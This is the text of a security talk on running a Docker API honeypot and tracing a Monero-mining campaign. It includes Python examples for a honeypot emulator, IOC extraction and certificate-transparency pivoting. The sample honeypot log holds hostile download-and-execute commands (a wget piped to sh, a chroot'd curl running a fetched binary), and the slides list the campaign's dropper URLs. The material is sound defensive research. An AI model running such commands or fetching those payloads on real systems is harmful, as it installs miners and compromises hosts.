Honeypot and Malware Hunting

Florian Charbonneau - HACK2G2

Whoami

Overview

  • Honeypot
  • Docker API
  • HoneyDock
  • Stats
  • Malware Analysis
  • Malware Infrastructure
  • Campaign Evolution

Honeypot

Low interaction

Pros:

  • Easy to deploy

  • Service or system emulation

  • Easy to monitor

Cons:

  • Captured attacks are limited to what the emulation supports

  • Easily detectable by an attacker

  • Few IOCs collected

High interaction

Pros:

  • Detection of advanced events and new exploits

  • Highly customizable

  • Difficult to detect by an attacker

  • Rich IOC

Cons:

  • Risky: a real, compromised system that must be contained

  • Complex implementation

  • Needs a dedicated, isolated architecture

Reference: "De l'intérêt du Honeypot" (On the value of honeypots), talk by Arnaud Zobec

Docker API

HoneyDock

  • Python, using Flask
  • 40 lines
  • Implemented endpoints (Docker Engine API)
    • _ping
    • version
    • info
    • containers/json
    • containers/create
    • images/create
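
The endpoints listed above, as an added example in the spirit of HoneyDock (this is not the author's 40-line Flask tool): a Docker Engine API emulator written against the standard library only, so it runs with no dependencies. It answers the same six routes with canned data, tolerates the `/v1.xx/` version prefix the Docker client sends, and records one event per request, pulling the fields that matter for a miner campaign (image, Cmd, Binds, Privileged) out of `containers/create`. The daemon version, host name, memory size and similar values in `VERSION` and `INFO` are assumptions, not real-host data.

```python
import hashlib
import json
import re
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Canned daemon identity returned to probes; every value here is an assumption.
VERSION = {"Version": "18.09.0", "ApiVersion": "1.39", "MinAPIVersion": "1.12",
           "Os": "linux", "Arch": "amd64", "KernelVersion": "4.15.0-42-generic"}
INFO = {"Containers": 0, "Images": 2, "OSType": "linux", "Architecture": "x86_64",
        "NCPU": 4, "MemTotal": 8 * 1024 ** 3, "Name": "docker-prod-01",
        "ServerVersion": VERSION["Version"]}

EVENTS = []  # in-memory event log; a real deployment would append JSON lines to disk


def fake_id(seed):
    """Deterministic 64-hex 'container id' so repeated probes get consistent answers."""
    return hashlib.sha256(seed.encode()).hexdigest()


def handle(method, url, body, src="0.0.0.0"):
    """Route one request to a canned response and record the IOCs it carries.
    Returns (status, payload); payload is a str for /_ping, otherwise JSON-able."""
    parsed = urlparse(url)
    path = re.sub(r"^/v\d+\.\d+", "", parsed.path)  # accept /v1.39/... prefixes
    query = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    try:
        data = json.loads(body) if body else {}
    except ValueError:
        data = {}
    if not isinstance(data, dict):
        data = {}
    event = {"ts": datetime.now(timezone.utc).isoformat(), "src": src,
             "method": method, "path": path, "query": query, "body": body}

    if method == "GET" and path == "/_ping":
        status, payload = 200, "OK"
    elif method == "GET" and path == "/version":
        status, payload = 200, VERSION
    elif method == "GET" and path == "/info":
        status, payload = 200, INFO
    elif method == "GET" and path == "/containers/json":
        status, payload = 200, []  # pretend nothing is running
    elif method == "POST" and path == "/images/create":
        image = query.get("fromImage", "")
        if "tag" in query:
            image += ":" + query["tag"]
        event["image"] = image
        status, payload = 200, {"status": "Pulling from " + image}
    elif method == "POST" and path == "/containers/create":
        hc = data.get("HostConfig") or {}
        if not isinstance(hc, dict):
            hc = {}
        # The fields a miner campaign needs: image, command, and the host-escape
        # settings (bind of / into the container, privileged mode).
        event.update({"image": data.get("Image"), "cmd": data.get("Cmd"),
                      "entrypoint": data.get("Entrypoint"),
                      "binds": hc.get("Binds"), "privileged": hc.get("Privileged")})
        status, payload = 201, {"Id": fake_id(json.dumps(data, sort_keys=True)),
                                "Warnings": []}
    else:
        status, payload = 404, {"message": "page not found"}
    event["status"] = status
    EVENTS.append(event)
    return status, payload


class Handler(BaseHTTPRequestHandler):
    server_version = "Docker/18.09.0"  # mimics the daemon's Server header
    sys_version = "(linux)"

    def _serve(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
        status, payload = handle(self.command, self.path, body, self.client_address[0])
        raw = payload if isinstance(payload, str) else json.dumps(payload)
        self.send_response(status)
        self.send_header("Content-Type",
                         "text/plain" if isinstance(payload, str) else "application/json")
        self.send_header("Content-Length", str(len(raw)))
        self.end_headers()
        self.wfile.write(raw.encode())
        print(json.dumps(EVENTS[-1]))  # one JSON line per request on stdout

    do_GET = do_POST = do_DELETE = _serve

    def log_message(self, *args):  # keep stdout to the JSON lines only
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 2375), Handler).serve_forever()
```

Run it on port 2375 (the unauthenticated Docker TCP port scanners look for) and `docker -H tcp://host:2375 version` from a client will talk to it; the recorded `cmd` and `binds` of each `containers/create` are the IOCs the next section mines.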

HoneyDock

  • Simple and fast to build
  • Easily spotted by an attacker
  • Low interaction

Stats

Collection period: 2018 Nov 8 - 2019 Jan 24 (78 days)

  • 14,000 requests from 165 IPs
  • ~180 requests/day on average (about one every 8 minutes)
  • Images requested
    • strm/xmrig
    • bitnn/alpine-xmrig
    • kannix/monero-miner
    • arayan/monero-miner
    • busybox
    • alpine
    • centos
    • ubuntu

Stats

Popularity of the miner images (approximate Docker Hub pull counts at the time):

  • kannix/monero-miner : 10M
  • bitnn/alpine-xmrig : 100k
  • strm/xmrig : 50k
  • arayan/monero-miner : 10k

Malware Analysis

Log Analysis

  • Source IP : 45.77.140.98
  • Domain : oceanhole.xyz
  • Dropper : https://oceanhole.xyz/d
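
The log-analysis step above, as an added example that is not the author's tooling: an IOC extractor run over honeypot events in JSON-lines form. The event shape (`src`, `image`, `cmd`, `binds`, `privileged`) is an assumption for this example, the sample lines are constructed, and their domains and addresses are reserved documentation values, not the campaign's. It pulls dropper URLs, hostnames and IPs out of the container command line, catches the bare `host:port` a mining pool is passed as, and flags the two host-escape tells (bind of `/`, privileged mode) per source IP.

```python
import json
import re
from collections import Counter
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"|;<>)]+""")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A bare host:port argument, the way miner images take their pool (-o pool:port)
HOSTPORT_RE = re.compile(r"^([a-z0-9-]+(?:\.[a-z0-9-]+)+):(\d{2,5})$", re.I)

# Constructed events in an assumed JSON-lines shape (one object per request);
# addresses are reserved documentation ranges, not the campaign's.
SAMPLE_LOG = """\
{"ts":"2019-01-10T03:12:44Z","src":"198.51.100.7","method":"POST","path":"/images/create","image":"alpine:latest","status":200}
{"ts":"2019-01-10T03:12:45Z","src":"198.51.100.7","method":"POST","path":"/containers/create","image":"alpine:latest","cmd":["sh","-c","wget -qO- https://example.invalid/d | sh"],"binds":["/:/mnt"],"privileged":true,"status":201}
{"ts":"2019-01-10T05:40:01Z","src":"203.0.113.9","method":"POST","path":"/containers/create","image":"kannix/monero-miner","cmd":["-o","pool.example.invalid:4444","-u","WALLET","-p","x"],"binds":null,"privileged":false,"status":201}
{"ts":"2019-01-10T06:01:10Z","src":"198.51.100.7","method":"POST","path":"/containers/create","image":"busybox","cmd":["sh","-c","chroot /mnt sh -c 'curl -s http://192.0.2.10:8080/x -o /tmp/x; chmod +x /tmp/x; /tmp/x'"],"binds":["/:/mnt"],"privileged":true,"status":201}
"""


def iocs_from_cmd(tokens):
    """Return (urls, hostnames, ipv4s) found in a container Cmd list."""
    tokens = [str(t) for t in tokens or []]
    text = " ".join(tokens)
    urls = set(URL_RE.findall(text))
    ips = set(IPV4_RE.findall(text))
    hosts = set()
    for u in urls:
        h = urlparse(u).hostname or ""
        if h and not IPV4_RE.fullmatch(h):
            hosts.add(h)
    for t in tokens:
        m = HOSTPORT_RE.match(t)
        if m and not IPV4_RE.fullmatch(m.group(1)):
            hosts.add(m.group(1).lower())
    return urls, hosts, ips


def analyse(log_text):
    """Aggregate per source IP: images used, network IOCs and host-escape indicators."""
    report = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        r = report.setdefault(ev["src"], {"images": Counter(), "urls": set(),
                                          "hosts": set(), "ips": set(),
                                          "host_mount": False, "privileged": False})
        if ev.get("image"):
            r["images"][ev["image"]] += 1
        urls, hosts, ips = iocs_from_cmd(ev.get("cmd"))
        r["urls"] |= urls
        r["hosts"] |= hosts
        r["ips"] |= ips
        # Mounting the host's / into the container, or running privileged,
        # is the tell that the actor wants the host and not just the container.
        if any(b.split(":")[0] == "/" for b in ev.get("binds") or []):
            r["host_mount"] = True
        if ev.get("privileged"):
            r["privileged"] = True
    return report


def defang(indicator):
    """Make a URL or host safe to paste into a report."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    for src, r in analyse(SAMPLE_LOG).items():
        print(src, dict(r["images"]),
              "host_mount=%s privileged=%s" % (r["host_mount"], r["privileged"]))
        for ioc in sorted(r["urls"] | r["hosts"] | r["ips"]):
            print("   ", defang(ioc))
```

The extracted URL is the starting point for the dropper and environment-setup stages that follow; fetch it from a sandboxed host, never from the honeypot itself.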

Dropper

https://www.oceanhole.xyz/d

Environment Setup

https://www.oceanhole.xyz/d3

Malware Analysis

Contents of https://www.oceanhole.xyz/xg.n.tgz:

  • .cf
  • b
  • kernelupd
  • xg

https://www.oceanhole.xyz/xg.n.tgz#.cf : xmrigCC

https://www.oceanhole.xyz/xg.n.tgz#b

https://www.oceanhole.xyz/xg.n.tgz#kernelupd

Malware Infrastructure

Infrastructure

  • oceanhole.xyz

  • vpn.oceanhole.xyz

  • host.oceanhole.xyz

oceanhole.xyz

  • Domain registered on 2018 Oct 03
  • IP : 185.10.68.35
  • Reverse DNS : 35.68.10.185.ro.ovo.sc (https://cock.li)
  • DNS CNAME:
    • wback.oceanhole.xyz
    • ipv4.oceanhole.xyz
    • www.oceanhole.xyz

oceanhole.xyz (open ports)

  • 22 : SSH
  • 80/443 : HTTP(S)
  • 3344 : HTTPS (xmrigCC dashboard)

oceanhole.xyz:443

  • Malware distribution (flagged on VirusTotal)
  • Config files : Docker, SSH key...
  • XMR miner (xmrigCC)
  • Web miner (crypto-loot.com)

vpn.oceanhole.xyz

  • IP : 45.77.140.98
  • The attacking machine
  • 22 : SSH

host.oceanhole.xyz

  • IP : 104.238.190.35
  • DNS CNAME : eu.proxy.oceanhole.xyz

  • 80 : xmr-node-proxy
  • 40929 : SSH

Campaign Evolution

Other Research

Tools

  • crt.sh
  • Amass
  • VirusTotal
  • urlscan.io
  • Onyphe
  • Shodan
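
The certificate-transparency pivot behind the first tool in the list, as an added example (not the author's workflow): crt.sh's JSON output lists every certificate issued for a name pattern, and its `name_value` / `not_before` fields give both the hostnames of an infrastructure (the kind of `vpn.`, `host.`, `www.` names mapped in the previous section) and the date each first appeared, which is the cheapest timeline of a campaign growing. `fetch_crtsh` performs the real query; the parsing is tested offline on constructed records for the reserved name `example.invalid`, including a wildcard certificate and an out-of-scope lookalike that must be filtered out.

```python
import json
import urllib.request
from urllib.parse import quote


def fetch_crtsh(domain, timeout=30):
    """Fetch crt.sh's JSON for every certificate whose name matches %.domain.
    Network call; the functions below work offline on its decoded output."""
    url = "https://crt.sh/?q=%s&output=json" % quote("%." + domain, safe="")
    req = urllib.request.Request(url, headers={"User-Agent": "ct-pivot-example/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def names_from_records(records, domain):
    """Flatten crt.sh records into {hostname: earliest not_before}.
    Keeps only names inside `domain`, strips wildcards, drops lookalikes."""
    domain = domain.lower()
    first_seen = {}
    for rec in records:
        candidates = rec.get("name_value", "").split("\n") + [rec.get("common_name", "")]
        for name in candidates:
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]
            if name != domain and not name.endswith("." + domain):
                continue  # e.g. example.invalid.evil.test is out of scope
            seen = rec.get("not_before", "")
            if name not in first_seen or seen < first_seen[name]:
                first_seen[name] = seen
    return first_seen


def timeline(first_seen):
    """Hosts in order of first certificate issuance; new names appearing over
    time are the signal that an actor is adding infrastructure."""
    return sorted(first_seen.items(), key=lambda kv: (kv[1], kv[0]))


# Constructed records in crt.sh's JSON shape (issuer_name, common_name, name_value,
# not_before, not_after); example.invalid is a reserved name, not a real target.
ISSUER = "C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3"
SAMPLE_RECORDS = [
    {"issuer_name": ISSUER, "common_name": "www.example.invalid",
     "name_value": "example.invalid\nwww.example.invalid",
     "not_before": "2018-10-05T10:00:00", "not_after": "2019-01-03T10:00:00"},
    {"issuer_name": ISSUER, "common_name": "vpn.example.invalid",
     "name_value": "vpn.example.invalid",
     "not_before": "2018-11-02T08:30:00", "not_after": "2019-01-31T08:30:00"},
    {"issuer_name": ISSUER, "common_name": "*.example.invalid",
     "name_value": "*.example.invalid\nexample.invalid",
     "not_before": "2018-12-01T00:00:00", "not_after": "2019-03-01T00:00:00"},
    {"issuer_name": ISSUER, "common_name": "example.invalid.evil.test",  # lookalike
     "name_value": "example.invalid.evil.test",
     "not_before": "2018-12-20T00:00:00", "not_after": "2019-03-20T00:00:00"},
]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "example.invalid"
    records = fetch_crtsh(target) if len(sys.argv) > 1 else SAMPLE_RECORDS
    for host, since in timeline(names_from_records(records, target)):
        print(since, host)
```

Each hostname that comes out goes on to the other tools in the list: resolve it, check the IP on Shodan or Onyphe for open ports, and query VirusTotal and urlscan.io for what was served.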

Thanks

Questions?

HACK2G2 | Honeypot and Malware Hunting, by Florian Charbonneau. Presented 30/01/2019.